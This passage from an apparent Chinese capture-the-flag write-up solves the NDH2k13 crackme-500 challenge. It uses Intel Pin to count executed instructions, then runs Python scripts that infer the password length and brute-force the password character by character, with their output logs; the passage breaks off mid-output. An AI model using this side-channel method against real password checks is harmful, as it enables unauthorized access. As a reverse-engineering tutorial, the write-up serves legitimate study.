来求解这道题目，先使用最常见的统计指令条数的方法</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">NDH2k13-crackme-500 <span class="o">[</span>master<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./inscount0.so -- ./crackme <span class="o">&lt;&lt;&lt;</span> <span class="s2">&#34;a&#34;</span> &gt;&gt; /dev/null<span class="p">;</span> cat inscount.out Count <span class="m">160345</span> NDH2k13-crackme-500 <span class="o">[</span>master●<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./myInscount0.so -- ./crackme <span class="o">&lt;&lt;&lt;</span> <span class="s2">&#34;a&#34;</span> Jonathan Salwan loves you &lt;<span class="m">3</span> ---------------------------- Password: Bad password Count: <span class="m">163218</span> NDH2k13-crackme-500 <span class="o">[</span>master●<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./myInscount0.so -- ./crackme <span class="o">&lt;&lt;&lt;</span> <span class="s2">&#34;aa&#34;</span> Jonathan Salwan loves you &lt;<span class="m">3</span> ---------------------------- Password: Bad password Count: <span class="m">166014</span> NDH2k13-crackme-500 <span class="o">[</span>master●<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./myInscount0.so -- ./crackme <span class="o">&lt;&lt;&lt;</span> <span class="s2">&#34;aaa&#34;</span> Jonathan Salwan loves you &lt;<span class="m">3</span> ---------------------------- Password: Bad password Count: <span class="m">168810</span> NDH2k13-crackme-500 <span class="o">[</span>master●<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./myInscount0.so -- ./crackme <span class="o">&lt;&lt;&lt;</span> <span class="s2">&#34;aaaa&#34;</span> Jonathan Salwan loves you &lt;<span class="m">3</span> ---------------------------- Password: Bad password Count: <span class="m">171606</span> NDH2k13-crackme-500 <span class="o">[</span>master●<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./myInscount0.so -- ./crackme <span class="o">&lt;&lt;&lt;</span> <span class="s2">&#34;aaaaa&#34;</span> Jonathan Salwan loves you &lt;<span class="m">3</span> ---------------------------- Password: Bad password Count: <span class="m">174402</span> NDH2k13-crackme-500 <span class="o">[</span>master●<span class="o">]</span> bpython bpython version 0.17.1 on top of Python 2.7.13+ /usr/bin/python2 &gt;&gt;&gt; <span class="m">174402</span> - <span class="nv">171606</span> <span class="o">==</span> <span class="m">171606</span> - <span class="nv">168810</span> <span class="o">==</span> <span class="m">168810</span> - <span class="nv">166014</span> <span class="o">==</span> <span class="m">166014</span> - <span class="m">163218</span> True &gt;&gt;&gt; </code></pre></td></tr></table> </div> </div><p>此时我们发现了一个很有趣的特性，输入长度每次增加 1 时，指令条数也是以等差的规模递增的</p> <blockquote> <p>myInscount0 是我在 inscount0 的基础上更改的 pintool，实现了从结果保存到文件到结果输出到标准输出的修改</p> </blockquote> <p>我们写一个简单的脚本查看输入长度递增时，指令条数的变化规律</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">NDH2k13</span><span class="o">-</span><span class="n">crackme</span><span class="o">-</span><span class="mi">500</span> <span class="p">[</span><span class="n">master</span><span class="err">●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">guessLen</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="kn">from</span> <span class="nn">subprocess</span> <span class="kn">import</span> <span class="n">Popen</span><span class="p">,</span> <span class="n">PIPE</span> <span class="kn">from</span> <span class="nn">sys</span> <span class="kn">import</span> <span class="n">argv</span> <span class="kn">import</span> <span class="nn">string</span> <span class="n">pinPath</span> <span class="o">=</span> <span class="s2">&#34;/home/m4x/pin-3.6-gcc-linux/pin&#34;</span> <span class="n">pinInit</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">tool</span><span class="p">,</span> <span class="n">elf</span><span class="p">:</span> <span class="n">Popen</span><span class="p">([</span><span class="n">pinPath</span><span class="p">,</span> <span class="s1">&#39;-t&#39;</span><span class="p">,</span> <span class="n">tool</span><span class="p">,</span> <span class="s1">&#39;--&#39;</span><span class="p">,</span> <span class="n">elf</span><span class="p">],</span> <span class="n">stdin</span> <span class="o">=</span> <span class="n">PIPE</span><span class="p">,</span> <span class="n">stdout</span> <span class="o">=</span> <span class="n">PIPE</span><span class="p">)</span> <span class="n">pinWrite</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">cont</span><span class="p">:</span> <span class="n">pin</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">cont</span><span class="p">)</span> <span class="n">pinRead</span> <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span> <span class="n">pin</span><span class="o">.</span><span class="n">communicate</span><span class="p">()[</span><span class="mi">0</span><span class="p">]</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> <span class="n">last</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">30</span><span class="p">):</span> <span class="n">pin</span> <span class="o">=</span> <span class="n">pinInit</span><span class="p">(</span><span class="s2">&#34;./myInscount0.so&#34;</span><span class="p">,</span> <span class="s2">&#34;./crackme&#34;</span><span class="p">)</span> <span class="n">pinWrite</span><span class="p">(</span><span class="s2">&#34;a&#34;</span> <span class="o">*</span> <span class="n">i</span> <span class="o">+</span> <span class="s1">&#39;</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span> <span class="n">now</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">pinRead</span><span class="p">()</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s2">&#34;Count: &#34;</span><span class="p">)[</span><span class="mi">1</span><span class="p">])</span> <span class="k">print</span> <span class="s2">&#34;inputLen({:2d}) -&gt; ins({}) -&gt; delta({})&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">now</span><span class="p">,</span> <span class="n">now</span> <span class="o">-</span> <span class="n">last</span><span class="p">)</span> <span class="n">last</span> <span class="o">=</span> <span class="n">now</span> </code></pre></td></tr></table> </div> </div><p>在我电脑上运行结果如下：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">NDH2k13</span><span class="o">-</span><span class="n">crackme</span><span class="o">-</span><span class="mi">500</span> <span class="p">[</span><span class="n">master</span><span class="err">●</span><span class="p">]</span> <span class="n">python</span> <span class="n">guessLen</span><span class="o">.</span><span class="n">py</span> <span class="n">inputLen</span><span class="p">(</span> <span class="mi">1</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">160307</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">160307</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span> <span class="mi">2</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">163103</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span> <span class="mi">3</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">165899</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span> <span class="mi">4</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">168695</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span> <span class="mi">5</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">171491</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span> <span class="mi">6</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">174287</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span> <span class="mi">7</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">177083</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span> <span class="mi">8</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">182804</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">5721</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span> <span class="mi">9</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">182676</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="o">-</span><span class="mi">128</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">185472</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">11</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">188268</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">12</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">191064</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">13</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">193860</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">14</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">196656</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">15</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">199452</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">202248</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">17</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">205044</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">18</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">207840</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">19</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">210636</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">20</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">213432</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">21</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">216228</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">22</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">219024</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">23</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">221820</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">24</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">224616</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">25</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">227412</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">26</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">230208</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">2796</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">27</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">244188</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">13980</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">28</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">244188</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">inputLen</span><span class="p">(</span><span class="mi">29</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">ins</span><span class="p">(</span><span class="mi">244188</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">delta</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </code></pre></td></tr></table> </div> </div><p>可以发现，在输入长度 &lt;8 时，指令条数是递增的，但长度为 8 与长度为 7 比较发生了突变，这个时候我们就可以大胆的推测当输入长度为 8 时，程序的运行流程有了较大的变化，正确的 flag 长度即为 8</p> <p>我们以输入长度是 8 为前提，再查看不同输入下指令条数的变化规律</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">NDH2k13-crackme-500 <span class="o">[</span>master●<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./myInscount0.so -- ./crackme <span class="o">&lt;&lt;&lt;</span> <span class="s2">&#34;&gt;???????&#34;</span> Jonathan Salwan loves you &lt;<span class="m">3</span> ---------------------------- Password: Bad password Count: <span class="m">185714</span> NDH2k13-crackme-500 <span class="o">[</span>master●<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./myInscount0.so -- ./crackme <span class="o">&lt;&lt;&lt;</span> <span class="s2">&#34;????????&#34;</span> Jonathan Salwan loves you &lt;<span class="m">3</span> ---------------------------- Password: Bad password Count: <span class="m">185714</span> NDH2k13-crackme-500 <span class="o">[</span>master●<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./myInscount0.so -- ./crackme <span class="o">&lt;&lt;&lt;</span> <span class="s2">&#34;@???????&#34;</span> Jonathan Salwan loves you &lt;<span class="m">3</span> ---------------------------- Password: Bad password Count: <span class="m">185714</span> NDH2k13-crackme-500 <span class="o">[</span>master●<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./myInscount0.so -- ./crackme <span class="o">&lt;&lt;&lt;</span> <span class="s2">&#34;A???????&#34;</span> Jonathan Salwan loves you &lt;<span class="m">3</span> ---------------------------- Password: Bad password Count: <span class="m">189752</span> NDH2k13-crackme-500 <span class="o">[</span>master●<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./myInscount0.so -- ./crackme <span class="o">&lt;&lt;&lt;</span> <span class="s2">&#34;B???????&#34;</span> Jonathan Salwan loves you &lt;<span class="m">3</span> ---------------------------- Password: Bad password Count: <span class="m">185714</span> NDH2k13-crackme-500 <span class="o">[</span>master●<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./myInscount0.so -- ./crackme <span class="o">&lt;&lt;&lt;</span> <span class="s2">&#34;C???????&#34;</span> Jonathan Salwan loves you &lt;<span class="m">3</span> ---------------------------- Password: Bad password Count: <span class="m">185714</span> </code></pre></td></tr></table> </div> </div><p>可以发现，输入以 ASCII码 顺序递增时，第一位为 A 时指令条数发生了变化，此时我们在进一步推测正确的 flag 第一位即为 A</p> <p>再写一个脚本逐位爆破</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">NDH2k13</span><span class="o">-</span><span class="n">crackme</span><span class="o">-</span><span class="mi">500</span> <span class="p">[</span><span class="n">master</span><span class="err">●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">guessPWD</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="kn">from</span> <span class="nn">subprocess</span> <span class="kn">import</span> <span class="n">Popen</span><span class="p">,</span> <span class="n">PIPE</span> <span class="kn">from</span> <span class="nn">sys</span> <span class="kn">import</span> <span class="n">argv</span> <span class="kn">import</span> <span class="nn">string</span> <span class="kn">import</span> <span class="nn">pdb</span> <span class="n">pinPath</span> <span class="o">=</span> <span class="s2">&#34;/home/m4x/pin-3.6-gcc-linux/pin&#34;</span> <span class="n">pinInit</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">tool</span><span class="p">,</span> <span class="n">elf</span><span class="p">:</span> <span class="n">Popen</span><span class="p">([</span><span class="n">pinPath</span><span class="p">,</span> <span class="s1">&#39;-t&#39;</span><span class="p">,</span> <span class="n">tool</span><span class="p">,</span> <span class="s1">&#39;--&#39;</span><span class="p">,</span> <span class="n">elf</span><span class="p">],</span> <span class="n">stdin</span> <span class="o">=</span> <span class="n">PIPE</span><span class="p">,</span> <span class="n">stdout</span> <span class="o">=</span> <span class="n">PIPE</span><span class="p">)</span> <span class="n">pinWrite</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">cont</span><span class="p">:</span> <span class="n">pin</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">cont</span><span class="p">)</span> <span class="n">pinRead</span> <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span> <span class="n">pin</span><span class="o">.</span><span class="n">communicate</span><span class="p">()[</span><span class="mi">0</span><span class="p">]</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> <span class="n">last</span> <span class="o">=</span> <span class="mi">0</span> <span class="c1"># dic = map(chr, xrange(0x20, 0x80))</span> <span class="n">dic</span> <span class="o">=</span> <span class="n">string</span><span class="o">.</span><span class="n">ascii_letters</span> <span class="o">+</span> <span class="n">string</span><span class="o">.</span><span class="n">digits</span> <span class="o">+</span> <span class="s2">&#34;+_ &#34;</span> <span class="n">pwd</span> <span class="o">=</span> <span class="s1">&#39;?&#39;</span> <span class="o">*</span> <span class="mi">8</span> <span class="n">dicIdx</span> <span class="o">=</span> <span class="mi">0</span> <span class="n">pwdIdx</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="n">pwd</span> <span class="o">=</span> <span class="n">pwd</span><span class="p">[:</span> <span class="n">pwdIdx</span><span class="p">]</span> <span class="o">+</span> <span class="n">dic</span><span class="p">[</span><span class="n">dicIdx</span><span class="p">]</span> <span class="o">+</span> <span class="n">pwd</span><span class="p">[</span><span class="n">pwdIdx</span> <span class="o">+</span> <span class="mi">1</span><span class="p">:</span> <span class="p">]</span> <span class="c1"># pdb.set_trace()</span> <span class="n">pin</span> <span class="o">=</span> <span class="n">pinInit</span><span class="p">(</span><span class="s2">&#34;./myInscount1.so&#34;</span><span class="p">,</span> <span class="s2">&#34;./crackme&#34;</span><span class="p">)</span> <span class="n">pinWrite</span><span class="p">(</span><span class="n">pwd</span> <span class="o">+</span> <span class="s1">&#39;</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span> <span class="n">now</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">pinRead</span><span class="p">()</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s2">&#34;Count: &#34;</span><span class="p">)[</span><span class="mi">1</span><span class="p">])</span> <span class="k">print</span> <span class="s2">&#34;input({}) -&gt; now({}) -&gt; delta({})&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">pwd</span><span class="p">,</span> <span class="n">now</span><span class="p">,</span> <span class="n">now</span> <span class="o">-</span> <span class="n">last</span><span class="p">)</span> <span class="k">if</span> <span class="n">now</span> <span class="o">-</span> <span class="n">last</span> <span class="o">&gt;</span> <span class="mi">2000</span> <span class="ow">and</span> <span class="n">dicIdx</span><span class="p">:</span> <span class="n">pwdIdx</span> <span class="o">+=</span> <span class="mi">1</span> <span class="n">dicIdx</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span> <span class="n">last</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">if</span> <span class="n">pwdIdx</span> <span class="o">&gt;=</span> <span class="nb">len</span><span class="p">(</span><span class="n">pwd</span><span class="p">):</span> <span class="k">print</span> <span class="s2">&#34;Found pwd: {}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">pwd</span><span class="p">)</span> <span class="k">break</span> <span class="n">dicIdx</span> <span class="o">+=</span> <span class="mi">1</span> <span class="n">last</span> <span class="o">=</span> <span class="n">now</span> </code></pre></td></tr></table> </div> </div><p>运行结果如下</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">NDH2k13-crackme-500 <span class="o">[</span>master●<span class="o">]</span> <span class="nb">time</span> python guessPWD.py input<span class="o">(</span>a???????<span class="o">)</span> -&gt; now<span class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>182804<span class="o">)</span> input<span class="o">(</span>b???????<span class="o">)</span> -&gt; now<span class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>c???????<span class="o">)</span> -&gt; now<span class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>d???????<span class="o">)</span> -&gt; now<span class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>e???????<span class="o">)</span> -&gt; now<span class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>f???????<span class="o">)</span> -&gt; now<span class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>g???????<span class="o">)</span> -&gt; now<span 